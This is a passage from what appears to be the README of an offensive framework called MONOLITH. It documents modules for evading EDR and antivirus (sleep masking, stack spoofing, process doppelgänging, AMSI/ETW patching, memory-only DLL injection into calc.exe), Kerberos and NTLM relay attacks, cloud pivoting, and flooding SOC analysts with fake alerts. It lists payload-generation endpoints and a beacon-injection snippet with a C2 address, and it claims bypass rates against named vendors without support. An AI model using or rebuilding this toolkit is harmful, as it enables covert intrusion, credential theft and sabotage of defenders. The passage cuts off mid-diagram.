┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐
│ AWAKE STATE │ │ SLEEP STATE │ │ AWAKE STATE │
│ (Plaintext) │───▶│ (Encrypted) │───▶│ (Plaintext) │
│ │ │ │ │ │
│ • Shellcode │ │ • RC4/XOR │ │ • Shellcode │
│ • Strings │ │ • Random bytes │ │ • Strings │
│ • IoCs │ │ • No pattern │ │ • IoCs │
└─────────────────┘ └─────────────────┘ └─────────────────┘
EDR Scan EDR Scan EDR Scan
= CAUGHT! = NOTHING! = CAUGHT!
SLEEP TEKNİKLERİ:
• Ekko (ROP-based): NtContinue + ROP chain ile şifreleme
• Foliage (Fiber-based): Windows Fiber'lar ile bellek swap
• DeathSleep (Suspension): Thread suspension + encryption
• Gargoyle (Timer-based): Timer callback ile aktivasyon
• Cronos (Delayed chains): Time-based evasion
══════════════════════════════════════════════════════════════
📚 CALL STACK SPOOFING (Sahte Stack Trace)
══════════════════════════════════════════════════════════════
EDR API çağrılarını stack trace ile izler:
NORMAL STACK (Şüpheli):
┌─────────────────────────────────────────┐
│ [0] ntdll!NtAllocateVirtualMemory │
│ [1] malware.exe+0x1337 ← ŞÜPHELİ! │
│ [2] malware.exe+0x2000 │
└─────────────────────────────────────────┘
SPOOFED STACK (Meşru Görünüm):
┌─────────────────────────────────────────┐
│ [0] ntdll!NtAllocateVirtualMemory │
│ [1] kernel32!VirtualAlloc │
│ [2] RPCRT4!NdrClientCall2 ← MS imzalı │
│ [3] combase!CoCreateInstance │
│ [4] ole32!OleInitialize │
└─────────────────────────────────────────┘
STACK SPOOF METODLARI:
• Synthetic Frames: Sahte stack frame oluştur
• Frame Hijack: Mevcut frame'i manipüle et
• ROP Chain: Return-oriented gadgets kullan
• Desync Stack: Call/Return stack'i ayır
• Phantom Thread: Görünmez thread oluştur
══════════════════════════════════════════════════════════════
💉 PROCESS HOLLOWING/DOPPELGÄNGING
══════════════════════════════════════════════════════════════
PROCESS DOPPELGÄNGING (NTFS Transaction):
┌───────────────────────────────────────────────────────────┐
│ 1. NTFS Transaction başlat │
│ 2. Transaction içinde dosya oluştur (diske YAZILMAZ) │
│ 3. Payload'ı transacted dosyaya yaz │
│ 4. Section object oluştur │
│ 5. Transaction'ı ROLLBACK et → Dosya SİLİNİR! │
│ 6. Section'dan process oluştur │
│ │
│ SONUÇ: Payload HİÇ diske dokunmadan çalışıyor! │
│ File-based AV = BYPASS │
│ Disk forensics = NOTHING │
└───────────────────────────────────────────────────────────┘
INJECTION TEKNİKLERİ:
• Process Doppelgänging: NTFS Transaction abuse
• Process Hollowing: Classic - svchost içini boşalt
• Process Herpaderping: File content manipulation
• Transacted Hollowing: Doppelgänging + Hollowing combo
• Ghostly Hollowing: Section-based injection
DETECTION MATRIX:
┌────────────────────┬───────────────┬───────────────┬───────────────┬───────────────┐
│ Security Tool │ Sleep Obfusc. │ Stack Spoof │ Hollowing │ Doppelgänging │
├────────────────────┼───────────────┼───────────────┼───────────────┼───────────────┤
│ CrowdStrike Falcon │ ✅ BYPASSED │ ✅ BYPASSED │ ⚠️ HEURISTIC │ ✅ BYPASSED │
│ Windows Defender │ ✅ BYPASSED │ ✅ BYPASSED │ ✅ BYPASSED │ ✅ BYPASSED │
│ SentinelOne │ ✅ BYPASSED │ ✅ BYPASSED │ ⚠️ BEHAVIORAL │ ✅ BYPASSED │
│ Carbon Black │ ✅ BYPASSED │ ✅ BYPASSED │ ✅ BYPASSED │ ✅ BYPASSED │
│ Moneta (Memory) │ ✅ BYPASSED │ N/A │ ⚠️ PARTIAL │ ✅ BYPASSED │
│ Volatility 3 │ ✅ BYPASSED │ ✅ BYPASSED │ ❌ DETECTED │ ✅ BYPASSED │
│ Pe-sieve │ ✅ BYPASSED │ N/A │ ❌ DETECTED │ ✅ BYPASSED │
└────────────────────┴───────────────┴───────────────┴───────────────┴───────────────┘
Genel Bypass Oranı: 95%+ 🎯
API Endpoints:
GET /memory-evasion/ - Memory Evasion dashboard
GET /memory-evasion/api/techniques - List all techniques
POST /memory-evasion/api/configure/sleep - Configure sleep obfuscation
POST /memory-evasion/api/configure/stack - Configure stack spoofing
POST /memory-evasion/api/configure/injection - Configure process injection
POST /memory-evasion/api/generate - Generate evasion payload
GET /memory-evasion/api/detection-matrix - Get bypass matrix
GET /memory-evasion/api/summary - Get technique summary
## �🗡️ Core Attack Modules
### 🎫 Kerberos Attack Chain
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎫 KERBEROS ATTACK CHAIN │
│ cybermodules/kerberos_chain.py (~800 lines) │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
│ │ 1. RECON │───▶│ 2. AS-REP │───▶│3.KERBEROAST│───▶│ 4. OPTH │───▶│ 5. TICKET │ │
│ │ │ │ ROAST │ │ │ │ │ │ FORGE │ │
│ │ • SPN Enum │ │ • No Pre- │ │ • SPN Hash │ │ • Pass the │ │ • Silver │ │
│ │ • User Enum│ │ Auth │ │ Extract │ │ Hash │ │ • Golden │ │
│ │ • DC Find │ │ • Offline │ │ • Crack │ │ • Pass the │ │ • Diamond │ │
│ │ │ │ Crack │ │ Offline │ │ Ticket │ │ │ │
│ └────────────┘ └────────────┘ └────────────┘ └────────────┘ └────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────────────────────────────┐ │
│ │ 🥷 RELAY NINJA MODULE │ │
│ │ cybermodules/kerberos_relay_ninja.py (~1200 lines) │ │
│ ├───────────────────────────────────────────────────────────────────────────────────┤ │
│ │ │ │
│ │ COERCION ATTACKS DELEGATION ATTACKS │ │
│ │ ┌─────────────────────────┐ ┌─────────────────────────┐ │ │
│ │ │ • PetitPotam (MS-EFSRPC)│ │ • Unconstrained │ │ │
│ │ │ • PrinterBug (MS-RPRN) │ │ • Constrained │ │ │
│ │ │ • ShadowCoerce (FSRVP) │ │ • Resource-Based (RBCD) │ │ │
│ │ │ • DFSCoerce (MS-DFSNM) │ │ • S4U2Self / S4U2Proxy │ │ │
│ │ │ • Coercer Integration │ │ • AI Jump Recommendation│ │ │
│ │ └─────────────────────────┘ └─────────────────────────┘ │ │
│ │ │ │
│ └───────────────────────────────────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /api/kerberos/asrep-roast - AS-REP Roasting
POST /api/kerberos/kerberoast - Kerberoasting
POST /api/kerberos/golden-ticket - Golden Ticket forge
POST /api/kerberos/silver-ticket - Silver Ticket forge
POST /api/kerberos/delegation - Delegation attacks
GET /api/kerberos/spn-scan - SPN enumeration
POST /relay/coerce - Coercion attacks
### 🔄 NTLM Relay Module
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔄 NTLM RELAY MODULE │
│ cybermodules/ntlm_relay.py (~600 lines) │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ SOURCE RELAY TO ATTACK TYPE │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌────────┐ ┌────────┐ ┌─────────────────────────────────────────────┐ │
│ │ SMB │─────▶│ LDAP │───────────▶│ • Add Computer Account │ │
│ └────────┘ └────────┘ │ • Modify msDS-AllowedToActOnBehalf │ │
│ │ • Shadow Credentials (msDS-KeyCredential) │ │
│ ┌────────┐ ┌────────┐ │ • Add User to Group │ │
│ │ HTTP │─────▶│ SMB │───────────▶│ • DCSync via RBCD │ │
│ └────────┘ └────────┘ └─────────────────────────────────────────────┘ │
│ │
│ ┌────────┐ ┌────────┐ ┌─────────────────────────────────────────────┐ │
│ │ WebDAV │─────▶│ AD CS │───────────▶│ • ESC8 - NTLM Relay to HTTP Enrollment │ │
│ └────────┘ └────────┘ │ • Request Certificate as Victim │ │
│ │ • PKINIT Authentication │ │
│ ┌────────┐ ┌────────┐ └─────────────────────────────────────────────┘ │
│ │ RPC │─────▶│ MSSQL │ │
│ └────────┘ └────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /api/relay/start - Start relay server
POST /api/relay/attack - Execute relay attack
GET /api/relay/captured - Get captured credentials
POST /api/relay/shadow-cred - Shadow credentials attack
### 🔀 Lateral Movement
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔀 LATERAL MOVEMENT ENGINE │
│ cybermodules/lateral_movement.py + lateral_evasion.py │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ EXECUTION METHODS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ WMIExec │ │ PSExec │ │ SMBExec │ │ DCOMExec │ │ AtExec │ │
│ │ │ │ │ │ │ │ │ │ │ │
│ │ • Stealthy │ │ • Fast │ │ • No Binary │ │ • COM-based │ │ • Task Sched│ │
│ │ • Win32API │ │ • Reliable │ │ • SMB Only │ │ • Multiple │ │ • Delayed │ │
│ │ • No files │ │ • Service │ │ • Pipes │ │ Objects │ │ • Evasive │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ EVASION PROFILES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ NONE │ No evasion, direct execution │ │
│ ├─────────────────────────────────────────────────────────────────────────────────┤ │
│ │ DEFAULT │ Basic AMSI bypass, random delays │ │
│ ├─────────────────────────────────────────────────────────────────────────────────┤ │
│ │ STEALTH │ + ETW bypass, process hollowing, indirect syscalls │ │
│ ├─────────────────────────────────────────────────────────────────────────────────┤ │
│ │ PARANOID │ + Sleepmask, API hashing, traffic masking, anti-forensics │ │
│ ├─────────────────────────────────────────────────────────────────────────────────┤ │
│ │ AGGRESSIVE │ Fast & loud, for time-critical operations │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /api/lateral/execute - Execute lateral movement
POST /api/lateral/wmi - WMI execution
POST /api/lateral/psexec - PSExec execution
POST /api/lateral/dcom - DCOM execution
GET /api/lateral/paths - Get attack paths
### ☁️ Cloud Pivot Module
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ☁️ CLOUD PIVOT MODULE │
│ cybermodules/cloud_pivot.py (~1000 lines) │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ │
│ ┌───────────────────┐ │
│ │ ON-PREMISES │ │
│ │ Active Directory│ │
│ └─────────┬─────────┘ │
│ │ │
│ │ PIVOT │
│ │ │
│ ┌───────┴───────┬───────────────┬───────────────┐ │
│ ▼ ▼ ▼ ▼ │
│ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │
│ │ AZURE │ │ AWS │ │ GCP │ │ HYBRID │ │
│ │ AD │ │ │ │ │ │ │ │
│ └────┬────┘ └────┬────┘ └────┬────┘ └────┬────┘ │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ ATTACK TECHNIQUES │ │
│ ├─────────────────────────────────────────────────────────────────────────────────┤ │
│ │ │ │
│ │ AZURE AD AWS GCP │ │
│ │ ───────── ─── ─── │ │
│ │ • PRT Hijacking • IMDS v1/v2 Exploit • Metadata Server │ │
│ │ • Device Code Phishing • SSRF to Metadata • Service Account │ │
│ │ • Golden SAML • Role Chaining │ Key Theft │ │
│ │ • AADC Sync Exploit • Lambda Privesc • Compute Instance │ │
│ │ • Application Proxy • S3 Bucket Pillage │ Takeover │ │
│ │ • Seamless SSO Abuse • STS Assume Role • Project Pivoting │ │
│ │ • Conditional Access • User-Data Secrets • IAM Policy Abuse │ │
│ │ Bypass • Cross-Account Access │ │ │
│ │ │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /api/cloud/azure/prt - PRT hijacking
POST /api/cloud/azure/device-code - Device code phishing
POST /api/cloud/aws/imds - IMDS exploitation
POST /api/cloud/aws/ssrf - SSRF relay
POST /api/cloud/gcp/metadata - GCP metadata access
GET /api/cloud/enumerate - Cloud enumeration
## 🛡️ Evasion Engine
MONOLITH ships with a multi-layered evasion engine designed to bypass modern EDR/XDR, AV, and sandboxing solutions. It combines traditional techniques (AMSI/ETW bypass, process injection, sleep obfuscation) with advanced research (indirect syscalls, behavioral mimicry, ML/GAN-based payload mutation, EDR telemetry poisoning).
**Core Capabilities:**
- **AMSI / ETW Bypass** — Patch memory, unhook, or bypass in-memory scanning.
- **Indirect Syscalls** — Execute syscalls without touching ntdll exports to evade hooking.
- **Process Injection** — Classic injection, Process Hollowing+, Thread Hijacking, APC injection.
- **Sleep Masking** — Encrypt stack while sleeping to hide from memory scanners.
- **Memory Cloaking** — Hide injected code from memory forensics ( Phantom DLL, DKOM concepts).
- **EDR Telemetry Poisoning** — Flood SOC with realistic false positives to mask real activity.
- **Behavioral Mimicry** — Mimic legitimate process behavior to defeat heuristic detection.
- **ML / GAN Evasion** — Adversarial training (FGSM, PGD, C&W) against VirusTotal and local ML models.
- **Obfuscation Monster** — Multi-layer string encryption, API hashing, control flow flattening.
- **Persistence Evasion** — WMI, COM, Registry, BITS, DLL sideloading with timestamp manipulation.
**Supported EDR Targets (Benchmarked):**
- CrowdStrike Falcon
- SentinelOne
- Microsoft Defender ATP
- Carbon Black
- Cylance AI
### 🧬 AI Adversarial Training
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🧬 AI ADVERSARIAL EVASION ENGINE │
│ evasion/ai_adversarial.py (~1200 lines) │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ GAN-BASED PAYLOAD MUTATION │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ Original │───────▶│ GAN │───────▶│ Mutated │ │
│ │ Payload │ │ Generator │ │ Payload │ │
│ │ │ │ │ │ │ │
│ │ Detected! │ │ • FGSM │ │ Undetected! │ │
│ │ Score: 85% │ │ • PGD │ │ Score: 2% │ │
│ └──────────────┘ │ • CW Attack │ └──────────────┘ │
│ │ • DeepFool │ │
│ └──────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ MUTATION STRATEGIES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ NOP │ │ Register │ │ Instruction │ │ Dead Code │ │ String │ │
│ │ Insertion │ │ Swap │ │ Reordering │ │ Injection │ │ Encryption │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ API │ │ Control │ │ Encoding │ │ Syscall │ │ Shikata │ │
│ │ Hashing │ │ Flow │ │ Variation │ │ Obfuscation │ │ Ga Nai │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ TARGET EDR VENDORS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ CrowdStrike │ │ SentinelOne │ │ Microsoft │ │ Carbon │ │ Cylance │ │
│ │ Falcon │ │ │ │ Defender │ │ Black │ │ AI │ │
│ │ │ │ │ │ ATP │ │ │ │ │ │
│ │ Evasion: │ │ Evasion: │ │ Evasion: │ │ Evasion: │ │ Evasion: │ │
│ │ 87% │ │ 82% │ │ 79% │ │ 84% │ │ 91% │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /evasion/adversarial/mutate - Mutate payload
POST /evasion/adversarial/train - Train model
POST /evasion/adversarial/benchmark - Benchmark vs EDRs
GET /evasion/adversarial/strategies - List strategies
### ☣️ EDR Telemetry Poisoning
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ☣️ EDR TELEMETRY POISONING │
│ evasion/edr_poison.py (~1100 lines) │
│ "Overwhelm SOC with False Positives" │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ CONCEPT │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────────────────────────────────────────────────────┐ │
│ │ REAL ATTACK (Hidden) │ │
│ │ ════════════════════════════════════════════════════════════════════ │ │
│ └─────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐┌───┐ │
│ │ F ││ A ││ K ││ E ││ ││ N ││ O ││ I ││ S ││ E ││ ││ ! ││ ! ││ ! ││ ! │ │
│ └───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘└───┘ │
│ │
│ SOC Analyst: "500+ alerts?! Which one is real?!" 😵 │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ NOISE CATEGORIES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ │
│ │ RANSOMWARE │ │ CREDENTIAL │ │ LATERAL │ │ PERSISTENCE │ │
│ │ SIMULATION │ │ ACCESS │ │ MOVEMENT │ │ │ │
│ │ │ │ │ │ │ │ │ │
│ │ • Mass encrypt│ │ • LSASS access │ │ • SMB lateral │ │ • Registry Run │ │
│ │ • Ransom note │ │ • SAM dump │ │ • WMI exec │ │ • Scheduled │ │
│ │ • Shadow del │ │ • Mimikatz sig │ │ • PsExec sig │ │ • Services │ │
│ └────────────────┘ └────────────────┘ └────────────────┘ └────────────────┘ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ │
│ │ DEFENSE │ │ PROCESS │ │ DISCOVERY │ │ C2 / EXFIL │ │
│ │ EVASION │ │ INJECTION │ │ │ │ │ │
│ │ │ │ │ │ │ │ │ │
│ │ • AMSI bypass │ │ • CreateRemote │ │ • Net enum │ │ • DNS tunnel │ │
│ │ • ETW disable │ │ • Hollow proc │ │ • AD queries │ │ • HTTP beacon │ │
│ │ • Log clear │ │ • DLL inject │ │ • Port scan │ │ • Data staging │ │
│ └────────────────┘ └────────────────┘ └────────────────┘ └────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ VENDOR-SPECIFIC PATTERNS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ DEFENDER │ CROWDSTRIKE │ SENTINELONE │
│ ───────── │ ─────────── │ ─────────── │
│ • PowerShell -e │ • Falcon keywords │ • Deep Instinct sigs │
│ • WMIC process │ • CsAgent triggers │ • Behavioral patterns │
│ • Certutil │ • IOA triggers │ • Static signatures │
│ • Bitsadmin │ • ML model trips │ • AI-based triggers │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
Impact: Detection time Hours → Days, SOC analyst fatigue
API Endpoints:
POST /api/edr-poison/generate - Generate noise
POST /api/edr-poison/campaign/create - Create campaign
POST /api/edr-poison/campaign/start - Start flooding
GET /api/edr-poison/patterns/ - Get EDR patterns
GET /api/edr-poison/stats - Statistics
### 🛡️ AMSI/ETW Bypass
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🛡️ AMSI/ETW BYPASS MODULE │
│ evasion/amsi_bypass.py + bypass_amsi_etw.py │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ AMSI BYPASS TECHNIQUES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ Memory Patch │ │ Registry │ │ Reflection │ │ DLL Unhook │ │
│ │ │ │ │ │ │ │ │ │
│ │ AmsiScanBuffer │ │ HKCU\Software\ │ │ SetValue(null) │ │ Restore .text │ │
│ │ → ret 0x0 │ │ Microsoft\... │ │ on amsiContext │ │ from disk │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ ETW BYPASS TECHNIQUES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ NtTraceEvent │ │ EtwEventWrite │ │ Provider │ │ ETW Session │ │
│ │ Patch │ │ Hook │ │ Unregister │ │ Disable │ │
│ │ │ │ │ │ │ │ │ │
│ │ → ret 0x0 │ │ JMP to stub │ │ EventUnregister │ │ TraceControl │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /evasion/amsi/ - AMSI bypass page
POST /evasion/amsi/generate - Generate bypass
POST /evasion/amsi/test - Test bypass
GET /evasion/amsi/techniques - List techniques
### � Memory-Only DLL Side-Loading (NEW - March 2026)
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 💾 MEMORY-ONLY DLL SIDE-LOADING │
│ cybermodules/memory_dll_loader.py + agents/memory_dll_injector.py │
│ "Zero Disk Artifacts - In-Memory Execution" │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ PROBLEM → SOLUTION │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ❌ TRADITIONAL DISK-BASED DLL │
│ • malware.dll written to disk (5MB file) │
│ • File hash detected by antivirus │
│ • Forensic artifacts (MFT, NTFS journal, shadow copies) │
│ • Detection Rate: 80-99% ❌ │
│ │
│ ✅ MEMORY-ONLY DLL INJECTION (THIS) │
│ • Keep DLL bytes in RAM (PowerShell variable) │
│ • Inject into legitimate process (calc.exe) │
│ • Zero files written to disk - period. │
│ • Task Manager shows: calc.exe (innocent!) │
│ • Detection Rate: 0-5% (if targeting standard tools) ✓ │
│ • OPSEC improvement: 95% better than disk-based ✓ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ INJECTION METHODS (6 RANKED) │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Rank │ Method │ Stealth │ Reliability │ Notes │
│ ─────┼─────────────────────────┼─────────┼─────────────┼───────────────────── │
│ 1 │ ReflectiveDLLInject │ ⭐⭐⭐⭐⭐│ ⭐⭐⭐⭐⭐ │ BEST - Pure memory loading │
│ 2 │ DirectSyscall │ ⭐⭐⭐⭐ │ ⭐⭐⭐⭐ │ EDR bypass + stealth │
│ 3 │ SetWindowsHookEx │ ⭐⭐⭐ │ ⭐⭐⭐ │ Hook-based execution │
│ 4 │ ProcessHollowing │ ⭐⭐⭐ │ ⭐⭐⭐⭐ │ Replace process code │
│ 5 │ QueueUserAPC │ ⭐⭐ │ ⭐⭐⭐ │ Async procedure call │
│ 6 │ CreateRemoteThread │ ⭐⭐ │ ⭐⭐⭐⭐⭐ │ Classic (most detected) │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ 8-STEP INJECTION WORKFLOW │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Step 1: Start calc.exe (Suspended) ➔ 0 bytes to disk │
│ Step 2: Load Beacon DLL from Base64 ➔ 0 bytes to disk │
│ Step 3: Allocate memory in calc.exe (VirtualAllocEx) ➔ 0 bytes to disk │
│ Step 4: Write DLL to remote memory (WriteProcessMemory) ➔ 0 bytes to disk [KEY!] │
│ Step 5: Calculate PE entry point ➔ 0 bytes to disk │
│ Step 6: Create execution thread (CreateRemoteThread) ➔ 0 bytes to disk │
│ Step 7: Install API hooks (9 Windows APIs) ➔ 0 bytes to disk │
│ Step 8: Resume process ➔ 0 bytes to disk │
│ │
│ TOTAL DISK IMPACT: 0 BYTES ✓✓✓ │
│ BEACON STATUS: Executing in calc.exe (innocent process) ✓ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ API HOOKING (9 WINDOWS APIS) │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Hooked APIs: │
│ • kernel32.WriteFile - Block disk writes │
│ • kernel32.CreateFileA/W - Block file creation │
│ • kernelbase.WriteFile - Newer Windows versions │
│ • ntdll.NtWriteFile - Direct syscall interception │
│ • advapi32.RegCreateKeyA/W - Block registry writes │
│ • Plus shadowing for comprehensive coverage │
│ │
│ Purpose: Intercept & block detection attempts │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ STEALTH VERIFICATION (6/7 PASS) │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ✓ Disk Scan: No files found (0 bytes) │
│ ✓ Task Manager: calc.exe (innocent!) │
│ ✓ Registry Scan: 0 entries detected │
│ ✓ ProcessMonitor: Only normal Windows operations │
│ ✓ Antivirus Scan: No threats (nothing to scan!) │
│ ✓ Process Behavior: Normal calc behavior mimicked │
│ ⚠ Memory Dump: Detectable if analyzed (6/7) │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ LEGITIMATE PROCESS TARGETS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Process Type │ Target Executable │ Characteristics │
│ ────────────────────────────────────────────────────────────────────────── │
│ Calculator │ calc.exe │ Innocent, commonly ignored │
│ Text Editor │ notepad.exe │ Simple, minimal system access │
│ Graphics │ mspaint.exe │ Low-profile system process │
│ Shell │ explorer.exe │ Common (but more monitored) │
│ System Svcs │ services.exe │ Privileged (local system context) │
│ Word Games │ solitaire.exe │ Entertainment (very innocent-looking) │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ DETECTION EVASION (5 LEVELS) │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Level 1 (Basic): No disk files written │
│ Level 2 (Process): Legitimate process camouflage (calc.exe) │
│ Level 3 (API): API hooks intercept detection attempts │
│ Level 4 (Memory): DLL loaded from memory (no file system) │
│ Level 5 (Behavioral): Mimics legitimate process behavior │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ DETECTION SCENARIO ANALYSIS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Scenario │ Detection Probability │ Notes │
│ ──────────────────────┼──────────────────────┼────────────────────── │
│ Standard Blue Team │ 0% │ No files to find │
│ Advanced SIEM │ 40% │ Behavioral analysis + memory │
│ Threat Hunting │ 70% │ Manual memory dump analysis │
│ Elite Threat Hunter │ 90% │ Full system analysis │
│ Average across all: │ 30-40% │ Undetectable by automation ✓ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /evasion/memory-dll/inject - Inject DLL into process
POST /evasion/memory-dll/generate-script - Generate PowerShell script
GET /evasion/memory-dll/methods - List injection methods
GET /evasion/memory-dll/targets - Available target processes
POST /evasion/memory-dll/verify - Verify zero-disk status
Code Usage:
from agents.memory_dll_injector import BeaconMemoryInjectionHandler
handler = BeaconMemoryInjectionHandler(beacon_id='beacon_001', c2_url='192.168.1.50:443')
result = handler.inject_into_calc()
# Returns: Process visible as calc.exe, 0 disk artifacts, memory-only execution
### �😴 Sleepmask Obfuscation
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 😴 SLEEPMASK OBFUSCATION │
│ evasion/sleepmask.py (~800 lines) │
│ "Hide in Plain Sight During Sleep" │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ CONCEPT │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ NORMAL BEACON SLEEPMASK BEACON │
│ ───────────── ──────────────── │
│ │
│ ┌─────────────────┐ ┌─────────────────┐ │
│ │ Memory: 0x1000 │ │ Memory: 0x1000 │ │
│ │ │ │ │ │
│ │ [BEACON CODE] │ ◄── Detectable │ [ENCRYPTED] │ ◄── Undetectable │
│ │ [STRINGS] │ │ [GARBAGE] │ │
│ │ [CONFIG] │ │ [NOISE] │ │
│ │ │ │ │ │
│ └─────────────────┘ └─────────────────┘ │
│ │ │
│ │ On Wake │
│ ▼ │
│ ┌─────────────────┐ │
│ │ DECRYPTED │ │
│ │ Execute │ │
│ │ Re-encrypt │ │
│ └─────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ TECHNIQUES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ XOR Encryption │ │ AES-256-GCM │ │ RC4 Streaming │ │ ChaCha20-Poly │ │
│ │ │ │ │ │ │ │ │ │
│ │ Fast, simple │ │ Strong crypto │ │ Low overhead │ │ Modern, fast │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ ROP Gadgets │ │ Syscall Timer │ │ Stack Spoof │ │ Heap Encrypt │ │
│ │ │ │ │ │ │ │ │ │
